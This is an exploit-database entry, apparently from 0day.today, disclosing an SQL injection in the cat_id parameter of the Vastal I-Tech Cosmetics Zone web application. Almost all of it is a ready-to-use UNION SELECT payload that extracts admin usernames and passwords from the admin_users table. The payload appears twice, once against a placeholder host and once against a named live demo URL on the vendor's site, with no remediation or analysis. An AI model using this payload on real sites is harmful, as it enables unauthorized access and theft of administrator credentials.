id: 3611
date: 09/04/2008
title: Vastal I-Tech Cosmetics Zone (cat_id) SQL Injection Vulnerability
author: Stack
cves: 

=================================================================
Vastal I-Tech Cosmetics Zone (cat_id) SQL Injection Vulnerability
=================================================================



#######################################################
#  Vastal I-Tech Cosmetics Zone  SQL Injection Vulnerability
#
# Author   : Stack
#
#
# Demo      : http://www.vastal.com/cosmetics_zone/
#######################################################

Exploit:
http://site.il/view_products_cat.php?cat_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/*
Live Demo
http://www.vastal.com/cosmetics_zone/view_products_cat.php?cat_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/*
##############################################################################################################



#  0day.today [2023-03-22]  #